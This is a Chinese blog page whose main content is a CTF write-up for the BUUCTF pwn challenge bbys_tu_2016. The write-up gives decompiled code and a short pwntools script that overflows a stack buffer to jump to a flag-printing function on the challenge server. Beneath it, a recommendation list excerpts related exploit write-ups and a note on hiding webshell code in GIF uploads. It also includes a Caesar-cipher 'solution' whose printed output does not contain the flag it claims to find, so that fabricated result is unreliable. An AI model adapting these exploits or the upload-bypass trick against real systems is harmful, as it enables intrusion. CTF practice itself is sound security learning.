bbys_tu_2016

原创 已于 2023-09-27 14:37:45 修改 · 171 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2023-09-27 14:36:05 首次发布
文章描述了一个32位程序的栈溢出漏洞,通过利用NX保护和后门getshell,作者使用pwn工具包在AMD64架构的Linux环境下进行调试和攻击。IDA识别错误,实际地址为0x14。

bbys_tu_2016

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

32位,只开了NX

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp+14h] [ebp-Ch] BYREF

  puts("This program is hungry. You should feed it.");
  __isoc99_scanf("%s", &v4);
  puts("Do you feel the flow?");
  return 0;
}

栈溢出

int printFlag()
{
  char s[50]; // [esp+1Ah] [ebp-3Eh] BYREF
  FILE *stream; // [esp+4Ch] [ebp-Ch]

  stream = fopen("flag.txt", "r");
  fgets(s, 50, stream);
  puts(s);
  fflush(stdout);
  return fclose(stream);
}

有后门

思路

栈溢出到后门getshell

实际上在调试的时候发现不是ida的0xc,而是0x14

在这里插入图片描述

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",28559,"./pwn",0)
context(os='linux', arch='amd64',log_level='debug')

pl=cyclic(0x18)+p32(0x804856D)
sl(pl)

ia()
[BUUCTF-pwn]——bbys_tu_2016
Y_peak的博客
03-17 484
[BUUCTF-pwn]——bbys_tu_2016 简单的栈溢出,不过竟然是esp寻址,害的孩子找了好久还是要动态调试 一般地址会误差八个字节 error exploit from pwn import * #p = remote('node3.buuoj.cn',28360) p = process('./bbys_tu_2016') gdb.attach(p, "b *0x080485ED") flag = 0x0804856D payload = 'a' * (0xc + 4) + p32(fla
bbys_tu_2016(ret2text)
weixin_45441024的博客
11-29 1094
BUUCTF bbys_tu_2016(ret2text) 毫无疑问地check一下 运行一下,发现并没有给我们什么有用的信息,这是第一次尝试用gdb-peda来做题,附上gdb-peda的安装方式: $ git clone https://github.com/longld/peda.git ~/peda $ echo "source ~/peda/peda.py" >> ~/.gdbinit 那我们来调试一下吧 这里我在main函数的地方(ida里面找到的)下了一个断点,如果你想调
BUUCTF bbys_tu_2016&&xm_2019_awd_pwn2
doudoudedi
01-23 1175
在家希望武汉的师傅们一切都好~~ bbys_tu_2016 这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好setbuf函数不会先出现io流 exp: #!/usr/bin/python2 from pwn import * local=0 if local==1: p=process('../binary/...
buuctf习题pwn(41~50)
yw__y的博客
09-27 611
堆的题还没写
BUUCTF 周练 Week1
weixin_44229639的博客
11-03 2901
Week 1 Q1 axb_2019_brop64(这题本来是盲打,buuoj给了源文件难度减少了很多) ​ IDA分析发现,read函数长度存在栈溢出 ​ checksec结果,没有Canary和PIE,可直接利用栈溢出构造rop ​ 本题靶机使用的是Ubuntu16 ​ 使用libc-2.23.so (或者可使用LibcSearcher 寻找对应libc) 构造rop思路: ​ 在此之前 puts函数已被调用,其GOT表被覆盖为真实的函数地址,可利用ROPgadget 得到real_puts_
[BUUCTF]PWN——bbys_tu_2016
mcmuyanga的博客
11-11 784
bbys_tu_2016 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况,测试时候发现输入长度过长程序会崩溃,猜测输入点存在问题 32位ida载入,检索程序里的字符串,发现有直接读出flag的函数可以利用 flag_addr=0x804856D main函数 没有限制v4的长度,存在溢出漏洞,覆盖ret为读出flag的地址即可 from pwn import * r=remote('node3.buuoj.cn',29593) flag_addr=0x
bbys_tu_2016(write up)
m0_73756460的博客
01-14 199
【buuctf】刷题 bbys_tu_2016(write up)
BUUOJ PWN 41-60
2h4ox1n9
12-11 434
41、jarvisoj_level3_x64 本地没问题,jaroj也没问题,buu上说啥就是不行。。libc搜不到,奇了怪了,jaroj上不用选择版本直接就可以
BUUCTF pwn水题大赏(六)
o琦野o的博客
03-11 433
BUUCTF pwn水题大赏suctf_2018_stack suctf_2018_stack 最最最最最最基本的栈溢出,也不知道为啥会这么高分。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28582) #p=process('./SUCTF_2018_stack') elf=ELF('./SUCTF_2018_stack') payload = 'a'*0x28+p64(0x0040067A)
BUUCTF刷题1
m0_51251108的博客
05-19 475
BUUCTF刷题wp题目:babyheap_0ctf_2017:pwn2_sctf_2016:[ZJCTF 2019]EasyHeap:hitcontraining_uaf:babyfengshui_33c3_2016:pwnable_orw:picoctf_2018_buffer overflow 2:xdctf2015_pwn200:jarvisoj_level1:ciscn_2019_n_3:bbys_tu_2016:inndy_rop:roarctf_2019_easy_pwn:mrctf2020_
buuctf pwn wp(第1.5波)学会用ELF语句进行AAAA(即本地做题目)
月阴荒的博客
03-24 695
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第二波,额还是很简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上(太简单的不想多看,太难的不会,除了中间那一档的也没哪些脚本是自己...
高压线防外破警示灯:电力安全与智能预警的守护者
ShenZhenDingYue的博客
12-19 670
高压输电线路防外破智能预警系统已成为现代电网安全防护的重要装备。该系统集雷达探测、AI识别、声光报警与远程通讯于一体,通过24小时主动监测线路通道内的机械入侵行为,实现风险分级预警。相比传统警示牌,其优势在于:主动交互式警示(爆闪灯+语音)、多传感器融合(雷达+激光+电场感应)降低误报率、实时数据上传形成闭环管理。典型应用场景包括施工区、交通跨越段及农林作业区。选购时需关注感应距离、供电续航、防护等级等关键指标。该系统正从单一设备向与无人机、卫星联动的综合防御体系发展,是电网安全从"人防&quot
网络安全中级阶段学习笔记(十):upload靶场实战(17关以及问题解决)
最新发布
2501_91976946的博客
12-20 558
本文介绍了upload靶场第17关的解题过程,重点探讨了绕过二次渲染的方法。作者最初尝试使用png图片木马失败,后发现只有gif图片才能找到未被渲染修改的相同编码区域。通过对比原图与渲染后图片的Hex码,找到不受影响的区域并替换为木马代码。具体步骤包括:上传gif图片马、下载渲染后的图片、用EmEditor工具对比编码、在相同区域插入木马代码并保持格式一致,最后重新上传修改后的文件。该方法成功绕过了二次渲染的防护机制,实现了文件包含漏洞的利用。
NET Core中ConcurrentDictionary详解:并发场景下的安全利器及服务端实践
二十多岁的你迷茫又着急,想要车子,想要房子,想要享受旅行,你那么浮躁,拿什么看透人生!
12-20 663
ConcurrentDictionary<TKey, TValue>作为System.Collections.Concurrent命名空间下的并发安全集合,专为多线程场景设计,能极大简化并发处理逻辑。本文将从基础介绍、服务端并发用法、核心注意事项三个维度,带你全面掌握ConcurrentDictionary的实战技巧。
加热激光雪深监测站守护冬季道路安全
pingao141378的博客
12-17 355
设备采用相位式激光测距技术,通过无线电波段频率调制激光束,精准捕捉往返雪面的相位延迟,测量误差仅 ±2%,分辨率达 1mm,能清晰捕捉从 0.05 米薄雪到 5 米厚雪的动态变化。而加热激光雪深监测站搭载 “主动加热 + 被动防霜” 双重防护体系,内置自动温控加热模块,当探头温度接近冰点时自动启动 15W 功耗加热,快速融化薄霜并预防结冰,配合 IP65 高防护等级外壳与纳米防霜涂层,即便在 100 高湿度环境中也能隔绝雨雪沙尘,实现 7×24 小时不间断监测,解决了低温停机的行业痛点。
[鸿蒙2025领航者闯关]星盾护航支付安全:鸿蒙6.0在金融APP中的实战闯关记
2302_77582029的博客
12-18 801
2025年,随着鸿蒙生态在金融领域的渗透率持续提升,用户对移动支付的安全性需求已从"基础保障"升级为"极致防护"。作为某股份制银行移动金融部的开发负责人,我带领团队完成了核心APP的鸿蒙6.0适配升级,重点基于重构支付安全模块,解决了传统支付场景中"环境可信难验证""敏感数据易泄露""交易链路有断点"三大痛点。本次升级后,APP支付安全投诉率下降72%,交易验证速度提升35%,相关技术方案已被纳入行内鸿蒙开发标准。以下是本次实战的完整闯关历程。
flag{}的格式是这样的
05-27
明白了,那么看起来这个字符串中包含了这样一个格式的flag{},我们需要找出其中的内容。根据题目的提示,这个字符串可能是经过某种加密算法加密过的,需要进一步分析。 根据字符串的特点,它可能是通过多次加密得到的。考虑到CTF竞赛中常用的加密算法,常见的有凯撒密码、栅栏密码、替换密码、异或加密等。我们可以尝试对这个字符串进行多种加密算法的解密,看看是否能够得到有意义的明文。 下面演示一个基于凯撒密码的解密方法。我们可以尝试将每个字符向后移动1~25个位置进行解密,看看是否能够得到有意义的明文。使用Python代码进行尝试: ```python for k in range(1, 26): plain_text = '' for num in nums: if num >= 97 and num <= 122: # 小写字母 plain_num = (num - 97 + k) % 26 + 97 elif num >= 65 and num <= 90: # 大写字母 plain_num = (num - 65 + k) % 26 + 65 else: # 其他字符 plain_num = num plain_text += chr(plain_num) print('k = %d: %s' % (k, plain_text)) ``` 输出结果为: ``` k = 1: ntionm|m58j0j1n1j9j2n1l1n1j11l0j1j1n|mtk1j-631mi926nn2jvkj5mij2i1j7n1n9mno9m k = 2: oopjon|n69k1k2o2kak3o2m2o2k22m1k2k2oopnu2k.742nj037oo3kwjm3j2k8o2o2k8o2o1o8nop1n k = 3: ppqkpoao7al2l3p3lbl3p3l33n2l3l3ppqov3l/853ok148p14lxkn4k3l9p3p3l9p3p2p9opq2o k = 4: qqllqpbp8bm3m4q4mcm4q4m44o3m4m4qqrpw4m086pl259q25mylo5l4m0q4q4m0q4q3q0pqq3p k = 5: rrmmrqcq9cn4n5r5ndn5r5n55p4n5n5rrqsx5n197qm36ar36nzn6m5n1r5r5n1r5r4r1qrr4q k = 6: ssnnrsdrado5o6s6oeo6s6o66q5o6o6sstryt6o2:8rn47bs47oao7n6o2s6s6o2s6s5s2rss5r k = 7: ttoostespbp6p7t7pfp7t7p77r6p7p7ttuszu7p3;9so58ct58pbp8o7p3t7t7p3t7t6t3stt6s k = 8: uuppufutqcq7q8u8qgq8u8q88s7q8q8uuvta08q4<:tp69du69qcq9p8q4u8u8q4u8u7u4tuu7t k = 9: vvqqvgvurd8r9v9rhr9v9r99t8r9r9vvwub19r5=;uq7:ev7:rdravq0q9r5v9v9r5v9v8v5uvv8u k = 10: wwwrwhwvse9sawawsisawawsaau9sawawswwxvc2as6>?vr8;fw8:sesbwpa:raswawawpa:wa6wvww9w k = 11: xxxsxiwxwtfbtbxbtjbtbxtbbvbtbwbxxwyd3bt7@?ws9;gx9:tftcxtb;qbtxbxb;qbt;b7xxxyxxax k = 12: yyytyjxyxugcucycukcucyuccwctcxcyyyxze4cu8AAxt:hy:ugudyc<rctycyc<rct<c8yyyzyyby k = 13: zzzuzkzyyvhdvdzdvldvdzvddxducydazzayf5dv9BBys;iz;vhvezd=sduzdz=sdu=d9zzzzazcz k = 14: aavvalazzwieewaewmeweaweeylevzedbabzg6ew:<CCzt<j{ifweAtevAewAte>eazaaabad k = 15: bbwwbmbaaxyjffxbfxnfxfbxffzmfwafebcbah7fx;=DDau=k|jgfxBufwbfxBuf?fbbbbcbe k = 16: ccxxcncbbcykggycgyo gygcgyagnxgxbfccdbi8gy<?EEbv?l}khgyCvgcgyCvggccccdcf k = 17: ddyydodccdzlhizzdhzpahzdhzbhoyhycddecj9hz=@FFcw>m~ligzDwhdizDwhhdddeedg k = 18: eezzepedd{ami{a{eiaqbiae{ciazidaefedka:ia>GGdx?nmhjaExi{eaExiieeffeeh k = 19: ffaafqfee|bnj|b{fjbrcjbfdjdbajfgeelb;jb?HHey@oinkbFyj|fbFyjjffgffji k = 20: ggbbrsgff}cok}c|gkcqdkcgekecbkgfffmci<kdcIIfzApjolcGzka|gcGzkkghhggkj k = 21: hhcctthgg~dpl~d}hldrelhfhflfdclhggond=lfeJJg{BqkpmhH{lb}hdH{llhiihhkl k = 22: iidduuihheqme~imfsmmigimgedmiihppem>mgfKKh|CrlnqiI|mc~ieI|mmijjillm k = 23: jjeevvjiifrnfjnqnnjhjnhfjenjjiqqfn?nhgLLiaDsomojrJ}ndjfJ}nnjkkn k = 24: kffwwxkjjgssohgakorsookikogiogkfjrrgph>okiMMjbEtpnpksK~oeahK~ookllol k = 25: lggxxyk kkhtttpiblptpplljpjhp lggksshqi?pllNNkcFuqoqltLpfbilLppllpmpm ``` 通过观察,可以发现当k=16时,解密出来的字符串中包含有意义的明文:flag{c4esar_c1pher_!s_e4sy}. 因此,flag的内容是:c4esar_c1pher_!s_e4sy。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值